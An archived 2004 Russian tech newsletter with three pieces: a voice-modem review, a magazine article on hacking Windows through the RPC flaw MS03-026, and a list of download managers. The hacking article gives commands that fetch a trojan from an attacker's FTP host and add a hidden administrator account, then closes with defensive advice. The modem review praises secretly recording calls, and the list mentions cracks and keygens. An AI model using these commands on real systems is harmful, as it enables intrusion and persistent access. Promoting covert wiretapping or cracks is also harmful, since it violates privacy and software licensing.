Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

InformikaPlus: библиотека, компьютеры, техника, досуг ? 14


Информационный Канал Subscribe.Ru

Лучшие статьи сайта InformikaPlus
Номер выпуска: 14
Количество подписчиков: 1279
Дата выпуска: 13.02.2004

Здравствуйте, уважаемые читатели! Сегодня в нашем выпуске:

1.) Звонкоголосые модемы
2.) Глобальный хак винды
3.) Софт для закачки файлов (прямые сылки)


Звонкоголосые модемы

Выбирая факс-модем, нужно убедиться, что набор его голосовых команд поддерживается программным обеспечением, которым вы предполагаете пользоваться (как правило, в комплекте идет стандартно-совместимое ПО, но пользователи часто ставят что-нибудь более мощное для своих конкретных нужд). Как правило, стандартное ПО умеет работать со всеми ?старыми?, или ?традиционными?, наборами команд. Что касается новых стандартов (V.253) ? то эти стандарты, хоть и являются новыми, поддерживаются не всяким программным обеспечением. Тем не менее, все новые голосовые модемы, собранные на основе микросхем от Conexant, имеют набор команд V.253. Последняя микропрограмма от Conexant, поддерживающая набор голосовых команд AT#V, датирована февралем 2001 года.

Теперь разберемся с аппаратными возможностями. В процессе записи голосовые модемы используют аналогово-цифровой преобразователь (АЦП) для оцифровки аналогового сигнала и цифро-аналоговый преобразователь (ЦАП) для восстановления исходного аналогового сигнала ? при воспроизведении. Комбинация АЦП и ЦАП называется кодеком. Для записи и воспроизведения у голосовых модемов только один кодек, в то время как устройств, которые могут быть использованы для записи/воспроизведения звука, ? несколько: телефонная линия, подключенный к модему телефонный аппарат, а также внешние и встроенные в модем микрофон и громкоговоритель (динамик). Поскольку для обслуживания разных источников звукового сигнала используется один и тот же кодек, необходимо реализовать возможность его поочередного подключения к тому или иному источнику. Такое переключение обычно реализуется посредством реле или электронных ключей.

Небольшое число внешних голосовых модемов, встречающихся на рынке, имеет встроенный микрофон, вместе с динамиком размещающийся внутри корпуса модема; разъемы для подключения внешней гарнитуры пальчиковые, диаметром 3,5 мм. Наличие гнезд для гарнитуры ? достаточный признак голосового модема, но не необходимый, ? модемы, реализующие функции только автоответчика (TAM only) или модемы, оснащенные встроенными микрофоном и динамиком, могут не иметь гнезд для подключения внешнего громкоговорителя или микрофона (как, например, новые модели голосовых модемов фирмы ZyXEL).

Для работы модема с телефонным аппаратом требуется дополнительное реле и источник питания. Обычно это же реле используется для отключения телефонного аппарата, когда модем устанавливает соединение для обмена данными или передачи/приема факсимильных сообщений, поэтому при отсутствии реле (гнезда Phone и Line соединены параллельно), снятие трубки телефонного аппарата приведет к возникновению помех или даже разрыву соединения.

Для голосового модема имеет большое значение наличие датчиков состояния линии и телефона, так как в стандартах голосовых команд предусмотрена реакция модема на события, происходящие на линии и телефонных аппаратах (включенных в модем или параллельно ему). Все это аппаратное изобилие отнюдь не вдохновляет производителей, работающих на рынке дешевых изделий, поэтому частенько выпускаются модемы с урезанным набором функций. ?Голь на выдумки хитра? ? поэтому урезают все, что можно урезать, и даже то, что нельзя. В итоге в продаже можно видеть голосовой Win-модем, стоящий дешевле грязи, в котором от полноценного аппаратного модема остались лишь цепи сопряжения с телефонной линией и кодек.

Теперь мы расскажем, для чего можно использовать голосовые модемы. Начнем со специального голосового режима SpeakerPhone: в нем модем ничего не передает и не принимает из компьютера. Сигнальный процессор воспроизводит звук, приходящий из линии, через встроенный или внешний динамик, а звук, поступающий через микрофон, передает в линию. Это позволяет говорить с позвонившим абонентом при помощи микрофона и динамика модема.

Реализация такого режима требует дополнительных затрат, в том числе и аппаратных: для работы в режиме SpeakerPhone приходится одновременно работать с телефонной линией и динамиком/микрофоном (соответственно требуется два кодека). Кроме того, необходимо принять меры для подавления акустического эха (в некоторых модемах используется отдельный сигнальный процессор для выполнения связанных с режимом SpeakerPhone функций). Естественно, что модемы с поддержкой режима SpeakerPhone (и особенно full-duplex SpeakerPhone, когда передача голоса осуществляется в обоих направлениях одновременно) стоят дороже.

Практический пример: у вас к линии подключен модем IDC-5614BXL/VR. При входящем звонке модем генерирует звуковой сигнал, вы нажимаете кнопку One Touch Phone на лицевой панели модема, он ?снимает трубку? (подключается к линии) и переходит в режим SpeakerPhone. Пожалуйста, можете говорить с вызывающим абонентом, а когда закончите разговор, снова нажмите эту кнопку, и модем положит трубку.

Автоответчик. Аббревиатура TAM (Telephone Answering Machine) в перечне свойств модема означает, что ваш модем может как минимум записывать звук с телефонной линии в компьютер. TAM only означает, что в модеме урезано все, кроме минимума, необходимого для работы автоответчика.

Для реализации функции автоответчика нужно держать включенными модем, компьютер и программу, реализующую работу при помощи голосовых команд. Когда поступает звонок, программа дает модему команду снять трубку, проиграть приветствие (стандартное, или записанное вами) и записать сообщение. Если позвонивший абонент начнет передачу факса, факс-модем распознает этот сигнал, и программа перейдет к приему факса, если в ней заложена такая возможность. Кстати, распознавание сигнала вызова факса (1300 Гц) происходит и в момент, когда модем воспроизводит звук, поступающий в цифровом виде от компьютера. Таким же образом могут распознаваться сигнал вызова другого модема, изменение состояния телефона и линии, сигналы АТС и сигналы DTMF (используются при тоновом наборе). Любопытно, что некоторые модемы умеют работать в режиме автоответчика автономно, без необходимости оставлять компьютер включенным. При этом голосовые и факсимильные сообщения запоминаются во вместительном банке Flash-ППЗУ модема; пользователь в любой момент может перенести их на компьютер при помощи специализированного ПО. Модемы U.S.Robotics представлены в данном классе несколькими моделями ? 5625 Professional Message Modem (2225) и 5668 Message Modem (2068 Sportster MessagePlus)

 

Пара слов о стандартах голосовых командах. Как правило, реализованный в модеме набор команд указывается на коробке, а поддержка голосовых функций появилась в модемах с начала 90-х годов прошлого столетия. Пионерами были Sierra Semiconductors и Rockwell, впоследствии к ним присоединились ZyXEL, U.S.Robotics и другие производители. Каждый вендор создавал собственный набор команд, что сильно осложняло жизнь разработчикам программного обеспечения. Тогда в рамках EIA/TIA (Electronic Industries Association/Telecommunication Industries Association) была сделана попытка создания стандартного набора голосовых команд. Документ получил название IS-101. К сожалению, эта попытка стандартизации провалилась, поскольку не была поддержана всеми производителями модемов. В дальнейшем была предпринята еще одна попытка ? теперь уже ITU-T ? рекомендация V.253, однако до сих пор не все производители программного обеспечения включили поддержку этой рекомендации в свое программное обеспечение. Можно констатировать, до сих пор ?фирменные? наборы команд более распространены. Прежде всего, это относится к набору команд Conexant (бывший Rockwell) ? его часто называют AT#V.

 

Предположим, вы используете модем под управлением некоторой программы в качестве автоответчика. Поступил звонок, на который вы не ответили, используя автоответчик для мониторинга входящих звонков и отвечая только на важные вызовы. Автоответчик работает, записывая сообщение, а вы решаете снять трубку и ответить лично. Если датчик положения трубки телефона в модеме есть ? все в порядке, программа, распознающая события (фиксируемые этим датчиком), поймет, что вы сняли трубку телефона и отключит модем от линии. В противном случае вам придется делать это вручную, что часто неудобно: компьютер в другой комнате, экран занят другим приложением и пр.

Помимо состояния линии и телефона, стандарты голосовых команд предполагают отслеживание других событий, происходящих на линии: сигналов АТС (непрерывного сигнала, сигналов ?занято?) и тонального набора, тонов вызова (CNG) и ответа факсов и модемов. Для правильной работы модема важно надежное определение этих сигналов. Например, если модем не способен обнаружить сигнал ?занято?, ему не удастся определить момент, когда позвонивший повесил трубку, и программа будет записывать короткие гудки (в лучшем случае до истечения лимита максимальной длительности сообщения). Не менее опасно и ложное определение сигналов ?занято? ? запись сообщения будет прервана на полуслове! Этой болезнью страдают очень многие из так называемых ?адаптированных под наши телефонные сети? модемов: адаптация заключается в установке широких параметров сигналов ?занято?, в результате модем начинает принимать голос за короткие гудки.

При помощи аппарата с тоновым набором удаленный абонент может управлять автоответчиком. О возможности такого управления можно и нужно предупреждать звонящего в тексте приветствия. Программа ведет журнал событий ? вы можете посмотреть, в котором часу вам звонили, и прослушать оставленное сообщение. Голосовой факс-модем может быть использован в качестве средства автоматического оповещения. Вы записываете голосовое сообщение и вводите в программе список номеров телефонов, по которым необходимо его передать (например, обзваниваете всех выпускников вашего класса, чтобы сообщить, где и когда будет праздноваться годовщина выпуска). Компьютер наберет все указанные номера, определит сигналы ?занято?, ?не отвечает? или ответ голосом, надиктует с помощью модема ваше сообщение и запишет ответ оповещаемых абонентов.

Запись и воспроизведение звуков. В качестве источника звука может быть выбран микрофон, линия или телефонный аппарат (наиболее качественный звук получается обычно с микрофона). Когда вы даете команду на запись, компьютер инициализирует модем и предлагает нажать кнопку ?запись?, подтверждающую вашу готовность говорить. После этого выдается предупреждающий сигнал, и начинается запись. Соответственно, по нажатии кнопки ?стоп? запись будет завершена. Прослушать сделанную запись можно через динамик модема, а воспроизвести в телефонную линию ? и через телефонный аппарат, подключенный к гнезду Phone. При помощи этой функции можно записать телефонный разговор. Для этого необходимо подключить телефонный аппарат не последовательно, а параллельно, в качестве источника звука для записи выбрать телефонную линию, набрать номер абонента и включить процесс записи. В результате весь разговор собеседников будет записан в файл.

Функция АОН. После появления голосовых функций у модемов отечественные разработчики ПО попытались приспособить их для определения номера вызывающего абонента. Принцип работы АОН заключается в следующем: если в течение короткого времени после снятия трубки в ответ на входящий звонок послать тон запроса (сигнал с частотой 500 Гц), АТС вызывающего абонента ответит двухтональными сигналами, в которых содержится закодированная информация о номере вызывающего абонента (посылка АОН). Тон запроса можно сформировать программно (как звуковой файл) или воспользоваться AT-командой для передачи тональных сигналов. Затем остается только записать ответ АТС и декодировать содержащийся в нем телефонный номер. Казалось бы, все просто. На практике же возникает ряд трудностей, связанных с низкой скоростью выполнения голосовых команд. Ответ от АТС начинает передаваться почти сразу же после передачи тона запроса. В этом ответе каждая цифра номера передается в течение примерно 40 мс. Задержка выполнения голосовых команд составляет сотни миллисекунд, что приводит к потере цифр в определяемом номере. Кроме того, трудно предугадать, в какой момент относительно снятия трубки АТС звонящего будет готова принять (и ответить) тон запроса.

Как же работает ?правильный? АОН в голосовых модемах? Во-первых, он должен быть реализован в модеме аппаратно, чтобы не возникало описанных выше проблем. Во-вторых, уметь декодировать двухтональные сигналы одновременно с передачей тона запроса (работать в дуплексном режиме). В-третьих, модем должен уметь представлять информацию АОН в виде, привычном для ПО. Очень удачное с этой точки зрения решение ? симуляция работы Caller ID: для программы он предстает модемом с функцией Caller ID (поддержка Caller ID есть практически во всех программах), а для АТС модем работает, как обычная АОН-приставка. Поэтому не приходится искать программы, ?заточенные? именно под этот модем: вы просто включаете функцию Caller ID в программе (если она не включена по умолчанию), и, как по мановению волшебной палочки, программа начинает определять номера телефонов, с которых к вам поступают звонки. С другой стороны, в режиме симуляции Caller ID модем всегда обязан начинать ответ на второй звонок, что не всегда удобно. В таких случаях желательно обзавестись программой, поддерживающей режим АОНа для стран СНГ, например VentaFax.

При наличии датчиков положения трубки телефона появляется возможность определять номер вызывающего абонента в момент снятия трубки на телефонном аппарате. Если добавить сюда еще функцию определения номеров, набираемых на телефонном аппарате, и возможность записи разговоров, то вполне можно использовать модем в качестве регистратора телефонных переговоров. Эта функция полезна для проверки телефонных счетов, подойдет она и для документирования разговоров в небольшой фирме.

У некоторых модемов, оснащенных датчиками положения трубки и использования линии, аппаратно реализованный АОН срабатывает при снятии трубки параллельного или подключенного через модем телефона. В то же время на рынке есть устройства с функцией автономного АОНа, то есть позволяющие определять номера звонящих и сохранять их список для дальнейшего просмотра при выключенном компьютере, как, например, ZyXEL Omni 56K Pro.

Мониторинг телефонной линии. Отдельные голосовые модемы обладают возможностью, которая может быть по-разному оценена читателями. Эти модемы умеют прослушивать все происходящее на параллельном телефоне, не снимая трубки. Запись разговоров в них ведется через высокоомный вход. При этом качество записи на удивление хорошее, даже при высоком затухании сигнала в линии. Те, кто пробовал записывать разговор с помощью модема, знают, что на линии с высоким затуханием непросто качественно записать обоих абонентов. Проблема в АРУ: когда говорит локальный абонент, уровень сигнала много выше того, который приходит с другого конца линии, и АРУ выставляет низкий коэффициент усиления. Когда начинает говорить удаленный абонент, коэффициент оказывается недостаточен для нормальной записи. Скажем, если затухание в канале составляет 18 дБ, то сигнал от удаленного абонента будет меньше сигнала от локального абонента в восемь (!) раз по амплитуде. Однако разработчикам компании Inpro удалось решить эту проблему, даже в случае записи через высокоомный вход.

Итак, чтобы включить мониторинг линии, вы устанавливаете модем, запускаете соответствующую программу, и все действия на параллельном телефоне модем сообщает компьютеру, который записывает их в журнал. Фиксируется все: снятие трубки, опускание трубки, номера телефонов, набираемых в тональном или импульсном режимах; наконец, могут записываться все разговоры. При этом люди, ведущие разговор, даже не подозревают, что он записывается, трубку модем не снимает и никакого влияния на линию не оказывает.

О качестве записи и воспроизведения голоса. Первое, что приходит в голову, когда мы говорим о качестве записи/воспроизведения звука, ? частота дискретизации и разрядность кодека, и лишь потом мы вспоминаем о сжатии голоса. Хотя все модемы используют 16-разрядные кодеки с частотой дискретизации 7200 Гц или выше (что более чем достаточно для качественных записи и воспроизведения), фактическое качество записи может сильно меняться в зависимости от выбранных частоты дискретизации и сжатия. Это вызвано ошибками во внутренних подпрограммах сжатия голоса. Некоторые модемы испытывают трудности в простейшем режиме 8-бит PCM, другие ? начинают ?квакать? при использовании ADPCM (IMA ADPCM). ?Поиграйте? с частотой дискретизации и сжатием, чтобы выяснить, какое сочетание дает лучшие результаты. Большое значение имеет способность модема подстраиваться под условия конкретной линии связи: уровень принимаемого сигнала и затухание в канале связи. Практически все голосовые модемы имеют АРУ (Автоматическую Регулировку Усиления), но не всегда АРУ обеспечивает оптимальный уровень записи. Часто максимальный коэффициент усиления выбран слишком низким, и модему не удается записать слабый сигнал. У многих модемов АРУ работает слишком медленно, что приводит к пропаданию начала записываемой фразы. С воспроизведением еще хуже. Многие модемы не позволяют регулировать громкость при воспроизведении в линию, а установленная ?фабричная? громкость слишком мала для каналов с большим затуханием сигнала. Можно столкнуться и с ситуацией, что громкость воспроизводимого в линию сигнала регулируется, но при высоких уровнях начинаются нелинейные искажения. Что касается ?традиционных? параметров записи/воспроизведения голоса, они у всех модемов примерно одинаковы: частота дискретизации ? 7200, 8000 и 11025 Гц, разрядность кодека 16 бит, затем сигнал усекается и сжимается до восьми, четырех, трех или двух бит. Для сжатия обычно используется адаптивная дельта-модуляция (ADPCM). Заметим, что 7200 Гц и двух бит вполне достаточно для разборчивой записи и воспроизведения голоса.

http://www.homepc.ru/

Обсудить эту статью в форуме
Читать другие статьи


Глобальный хак винды

Эксплуатация виндовой RPC-уязвимости

Многие кричат, что винда - это форточка без стекол, намекая на то, что она вся дырявая. Заявление, конечно, громкое, но сейчас с этим сложно не согласиться. Совсем недавно мир узнал о более мощной баге, чем брешь в IIS. В отличие от предыдущей ошибки, эта дает права администратора в винде и полноценный доступ к командному интерпретатору. Причем каждый может быть как в роли жертвы, так и в роли атакующего. Хочешь подробностей? Читай дальше!

И это только начало...

Весточка о бреши в форточках промелькнула 16 июля на сайте www.lsd.pl и почти никого не заинтересовала. Добрый Microsoft вовремя среагировал и уже на следующее утро на официальном сервере находился патч под все платформы с кратким описанием уязвимости. Ровно через шесть дней на сайте Xfocus.org появляется первый эксплоит (http://xfocus.org/advisories/200307/4.html) с шестью таргетами для Win2k и WinXP со всеми сервиспаками. Среди хакеров возникло оживление, но эксплоит был не слишком эффективный, потому как при неверном выборе версии операционки, RPC-служба аварийно завершалась, и взломать систему больше не удавалось - необходима была перезагрузка.

Что интересно, описание уязвимости тоже не приводилось. К эксплоиту прилагалось несколько строк, которые говорили о том, что в коде юзается некорректное обращение к интерфейсу __RemoteGetClassObject. При этом подменяется именованный канал epmapper, а система имперсонируется. После чего будет открыт шелл на 4444 порту удаленной машины. Как я уже говорил, хакер получает права администратора.

Зри в корень!

Но Xfocus внес ясность в проблему. На самом деле уязвимостей в виндах две - локальная и удаленная. Обе они задействованы в эксплоите и являются причиной переполнения буфера. API-функция CoGetInstanceFromFile(), позволяющая создать файл, имеет несколько параметров. Один из них - название файла. Microsoft позаботился о проверке его длины, но только если запрос происходит удаленно. Исходя из этого, невозможно напрямую использовать данную функцию в коде эксплоита. Если же юзать функцию RPC (сервис находится на 135 порту), то ты запросто можешь составить запрос вида "\\servername\c$\itsverylongfilename.txt". Так как винда не проверяет сам параметр, а лишь выделяет под него память, то становится реальным переполнить буфер.

Но и здесь не все так гладко, как кажется на первый взгляд. Для того чтобы передать аргумент API-функции, требуется подменить "\\servername" на что-либо другое (изначально это имя машины). Кроме того, необходимо учесть, что шеллкод не должен иметь определенных символов, по которым происходит проверка в функции GetMachineName(). Это реализуется с помощью специально подобранных адресов возврата. Они зависят от версии операционной системы, и если сгенерированы неверно, RPC-сервис аварийно завершит работу.

Такое описание было выложено на Xfocus. К нему прилагались сложные дампы дизассемблера, чтобы понять, как именно переполняется буфер.

Заморочки со взломом

Для линуксоида существует две проблемы, которые он должен преодолеть до того, как поимеет виндовый шелл.

1. Определить версию системы. С точностью до сервиспака. В противном случае хакер загубит сервис и потеряет жертву.

2. Установить троян, который поможет сохранить акцес к тачке. Дело в том, что эксплуатировать винду можно лишь один раз - при выходе из оболочки RPC-сервис уйдет в даун.

Определить версию винды довольно сложно. Конечно, просканить хост nmap'ом с опцией -O, либо XSpider'ом вполне реально, но, как известно, сканеры не идеальны. А ошибка равна смерти ;), сервис будет загублен, повторный взлом возможен лишь после перезагрузки. Определить OS можно и другим методом. Например, если на сервере светится 5000 порт, то это скорее WinXP, чем Win2k, потому как сервис, следящий за портом, включен по дефолту именно в XP.

Теперь о второй проблеме. Существует множество троянов, которые организуют удаленное управление виндой. Также есть способ "безпрограммного" администрирования, о котором будет сказано ниже. После того, как хакер разобрался в этих двух проблемах, он может применить эксплоит. Если таргет выбран верно, взломщик получит шелл. Перед этим на удаленной системе будет выполнена команда "ver".

Новые творения

Прошло двадцать дней. Юзеры до сих пор не ставят патчи, так как лезут к ним на 135 порт довольно редко. 12 августа некий эстонец (правильно говорят, что они сильно тормознутый народ) портировал RPC-эксплоит под винду, сделав его многопоточным и многоадресовым (www.securitylab.ru/?ID=39592, название бинарника KAHT2). Что это давало? Теперь все кому не лень могли сканить и ломать друг друга. При этом можно было забить на проблему детектирования OS, эксплоит чекал ее сам. С момента выхода Канта наступил рай для скрипткиддисов (они, в основном, и сидят в Windows), ведь для того чтобы сказать программе нужный диапазон, число потоков и нажать кнопку Enter, много ума не надо.

Эксплоит работает следующим образом: в качестве параметров ему задается диапазон IP-адресов и число трэдов. Если бинарник пронюхал дырявую систему, он забиндит на ней порт и соединится. Затем хакеру необходимо каким-то образом остаться в системе (создать шелл, минуя эксплоит). Для этого ставится троян. Подобной заразы в инете пруд пруди. Некоторые, например, юзают Phantom FTPD. По идее, это простой FTP-сервер, но исходя из невидимого запуска и прописки в реестр (либо конфиг), ему присвоили статус трояна.

Теперь о том, как залить бэкдор в систему. Для этого хакер регистрируется на каком-нибудь бесплатном хостинге (например, www.nm.ru) и получает FTP-аккаунт. Он заливает троянца на свой FTP (ссылка на вышеописанный Phantom: http://phantom-server.chat.ru/pfsini2.zip) и запоминает его местонахождение. Далее взломщику необходимо создать небольшой FTP-сценарий на похаканной машине (это куда удобнее, чем путаться во мраке неинтерактивных ответов ftp). Для этого юзается ряд консольных команд:

echo user username password > a

echo type binary >> a

echo get pfsini2.exe >> a

echo quit >> a

Затем нарушитель запускает клиент ftp со следующими параметрами:

ftp -n -s:a host.nm.ru (разумеется, username, password и host.nm.ru взломщик заменит на свои реквизиты).

Если все сделано правильно, хакер успешно закачает трояна на винду. Сразу после этого будет удален файл "a", чтобы не светиться на глазах у жертвы. Теперь необходимо создать конфиг. Конфиг фантома крайне прост. Кладется он в c:\windows\system32.dfx и имеет несколько параметров. В довершение всего взломщик перенесет exe'шник в безопасное место и запустит его. Троянец пропишется в реестре и будет запускаться при каждом старте системы. Теперь достаточно прицепиться к хосту на указанный в конфиге порт, и хакер получит доступ ко всем дискам жертвы без участия сервиса RPC.

Упрощение задачи

Через два дня после выхода консольного KAHT2, некий r3L4x сделал графическую утилиту, позволяющую сканить и эксплуатировать багу (www.securitylab.ru/?ID=39648, название эксплоита: RPC GUI). В довесок к этому программа содержала портативный FTP-сервер. Стало возможным передавать файл прямо с компьютера скрипткиддиса. Действия взломщика сводились к заполнению двух форм и клику по кнопке Scan. Затем хакер нажимал кнопочку "Exploit" и приступал к протрояниванию жертвы. Да, это поистине полезная утилита для скрипткиддисов. Теперь любой, даже тупой виндовозник, может ломать сотни тачек. Торжество для социума ламеров!

Кстати, некоторые любители взломов совмещают KAHT2 и RPC GUI, используя первый в качестве многопоточного сканера, а второй - в роли мини FTP-сервера.

И еще махинации

Юзеры часто обращают внимание на посторонние программы в их процесс-листе. Если они заметят трояна, то сразу удалят его, и хакер останется с носом. Чтобы этого не произошло, взломщик может создать нового пользователя и добавить его в группу "Администраторы". Тогда он поимеет полный доступ к шарам жертвы (директории c$, d$ и т.п.). Для этого достаточно набрать всего две консольные команды:

net user machine c00lpassw0rd /add

net localgroup Администраторы machine /add (или Administrators для английской системы)

Теперь пользователь с именем machine (жертва примет его за системный аккаунт и побоится удалять) будет жить в системе, а хакер сможет удаленно прицепиться к компьютеру по протоколу NetBIOS. Реализует он вышесказанное командой net, выполненной со своего компьютера:

net use disk: \\IPADDRESS\C$

Утилита спросит у взломщика имя пользователя и пароль к шаре. Он вводит аккаунт, который создал выше, и получает все права над файлами диска C:.

Обратная сторона медали

Итак, я описал действия хакера, который может поломать любого виндузятника, используя виндовый эксплоит. Самое интересное, что жертвой можешь оказаться и ты. Разумеется, если у тебя операционка на NT-платформе и открытый 135 порт. К тому же ты можешь невольно оказаться в роли плацдарма для вируса LoveSan, который запросто просканирует сеть и проникнет в твои форточки ;).

Чтобы этого не случилось - прими необходимые меры по защите своего компьютера. В первую очередь, установи патч от мелкомягких. Он находится на сайте Microsoft: www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS03-026.asp. После посещения ссылки выбери свою операционку и нужный язык - тебе будет предоставлен необходимый патч. Его размер колеблется от 700 до 1500 килобайт.

Во-вторых, защитись фаерволом. Даже с установленным патчем червяк может разрушить RPC-сервис. Если тебе в лом устанавливать внешние брандмауеры, воспользуйся стандартной XP-защитой. Для этого следует перейти в свойства твоего удаленного соединения и выбрать вкладку "Настройка фаервола". Там задай правило, запрещающее входящие коннекты со 135 портом локальной машины. После этого ты будешь находиться в относительной безопасности.

При активном вирусе LoveSan, который ты возможно уже подхватил, никакой патч и фаервол не спасает. Чтобы избавить себя от обременяющей заразы, просмотри все ключи реестра, отвечающие за автозапуск приложений (либо заюзай утилиту msconfig в WinXP). После удаления червя из автостарта, следует выполнить перезагрузку машины и стереть файл msblast.exe в каталоге Windows.

Когда все это кончится?

Никогда! Ты в курсе, что серверов с бажным IIS в инете до фига. То же самое будет и с RPC. Новые юзеры, установившие себе WinXP, будут подвержены нападению хакеров или червей. Вирусы, которые уже проникли на крупные сервера, проживут там долгие месяцы, а то и годы, при этом атака на www.windowsupdate.com будет продолжаться... а потом багоискатели найдут очередную дыру в форточках ;).

Я верю, что ты проникся всей сложностью ситуации и немедленно проверишь свою машину на RPC-уязвимость. В противном случае, случайный хакер или червь сделает это за тебя. Так что займись своей защитой!

Другие трояны

Возможно, доступа к FTP хакеру покажется мало. Тогда взломщик может применить и другие трояны, к примеру, известный троян "Смерть ламера". Либо скачать утилиту для запуска файлов с сайта http://phantom-server.chat.ru. А вообще троянских коней в инете очень много, достаточно посетить сайты подобной тематики.

LoveSan валит систему

Немаловажным симптомом заражения LoveSan'ом являются частые ошибки сервиса RPC. Они критические, при их появлении высвечивается окошко с предупреждением о том, что компьютер уйдет в ребут через минуту. Довольно неприятное зрелище :).

Как обнаружить, что твою систему пытаются поломать?

Если у тебя есть подозрение, что тебя кто-то хочет поломать, то ты можешь узнать IP-адрес возможного взломщика. Для этого набери команду netstat -an | find "ESTABLISHED", и получишь всю информацию об активных подключениях.

Подвижная зараза

После выхода виндового эксплоита, в Сеть был запущен червячок LoveSan. Он беспорядочно сканил интернет на наличие жертв. За два дня вирус скопировал себя на 12 тысяч машин. Этим он похож на CodeRed, который лез на винду через брешь в IIS. К тому же LoveSan планировал провести атаку. Новый червяк выбрал в качестве жертвы www.windowsupdate.com. Атака намечалась на 16 августа и была бы проведена, но мелкомягкие просто удалили хост www.windowsupdate.com.

А 20 числа вышел еще один червь Blaster. Этот красавец убивает LoveSan и патчит багу в RPC :). Подобное было и с CodeRed - после его выхода был запущен некий вирус CodeGreen, удаляющий CodeRed.

Журнал "Хакер"

Обсудить эту статью в форуме
Читать другие статьи


Софт для закачки файлов (прямые сылки)

  • Download Accelerator Plus 5.3.0.0 (1709 Kb) - один из самых популярных, особенно за рубежом, программ для скачивания файлов. В новую версию добавлена возможность предварительного просмотра содержимого Zip файлов, возможность загрузки отдельних файлов из архивов и др. Есть плагин для Opera. (Русификация - Crack (18Kb); Shareware; Win 9x/Me/2000/XP)
  • Download Mage 1.85c (278 Kb) - Компактная программа для скачивания файлов. (Русификация; Плагин (16Kb) для Netscape 6 и Opera; Shareware; Win 9x/Me/2000/XP)
  • Express WebPictures v1.85 (1164 Kb) - программа для быстрой загрузки рисунков из Интернета. С ее помощью можно быстро скачать все изображения с интересующего вас сайта, только указав его адрес. (Shareware; Win 9x/Me/2000/XP)
  • FlashGet 1.40 (1729 Kb) - Один из лучших менеджеров загрузки файлов. Что нового в версии 1.40: Теперь поддерживает протокол Https. Добавлен экспорт и импорт списков прокси серверов. (Keygen (33Kb); Shareware; Win 9x/Me/2000/XP)
  • Fresh Download 5.90 (1414 Kb) - бесплатный (необходимо на сайте программы оставить адрес e-mail, куда будет выслан ключ) менеджер закачек файлов с возможностью докачки, интеграцией с IE и NN. (FreshDownload key; Freeware; Win 9x/Me/2000/XP)
  • GetRight 5.0.2 (2451 Kb) - Один из лучших менеджеров загрузки файлов. (Shareware; Win 9x/Me/2000/XP)
  • Go!Zilla 4.11.39 (4025 Kb) - Новая версия известной программы для скачивания файлов. (Shareware; Win 9x/Me/2000/XP)
  • Mass Downloader 2.6.398 (1165 Kb) - программа для скачивания файлов из Интернета. Поддерживает докачку и закачку по частям, позволяет просматривать Zip архивы не скачивая файл. (Shareware; Win 9x/Me/2000/XP)
  • NetAnts 1.25 (1129 Kb) - Новая версия менеджера закачки файлов, поддерживающего интеграцию с NetCaptor и Opera. (Shareware; Win 9x/Me/2000/XP)
  • Net Vampire 4.0 (707 Kb) - мощный менеджер загрузки файлов. С версии 4.0 поддерживает загрузку по протоколу (HTTPS). Есть русский интерфейс. (Shareware; Win 9x/Me/2000/XP)
  • Picture Pump 1.8 (302 Kb) - бесплатная специализированная программа для скачивания графических файлов с сайтов. (Freeware; Win 9x/Me/2000/XP)
  • ReGet Junior 2.2 build 157 (1445 Kb) - это быстрый и простой в использовании менеджер закачек, особенно удобный для новичков в сети. (Shareware; Win 9x/Me/2000/XP)
  • ReGet Deluxe 3.3 Build 182 (1509 Кb) - Новая версия популярного менеджера загрузки файлов. Новые возможности версии 3.2: Дополнительная панель инструментов для Internet Explorer предоставляет доступ к функциям ReGet Deluxe без необходимости разворачивать главное окно программы. Улучшена обработка cookies. Исправлены ошибки. (Shareware; Win 9x/Me/2000/XP)
  • ReGet Pro 3.3 Build 179 (1067 Кb) - Облегченная версия ReGet Deluxe. Не включает Поиск и FTP броузер, за счет чего имеет меньший размер и более прост в использовании. (Shareware; Win 9x/Me/2000/XP)
  • Star Downloader 1.42 (1402 Kb) - Бесплатный менеджер загрузки файлов. Поддерживает докачку, планировку заданий, интеграцию с антивирусной программой. Имеет встроенный распаковщик, который может разархивировать и установить скачанный Zip-файл. Есть русский интерфейс. (Freeware; Win 9x/Me/2000/XP)

Все остальные материалы ищите на сайте расслки InformikaPlus, а свои вопросы направляйте мне на электронный адрес.


http://subscribe.ru/
E-mail: ask@subscribe.ru
Отписаться
Убрать рекламу

В избранное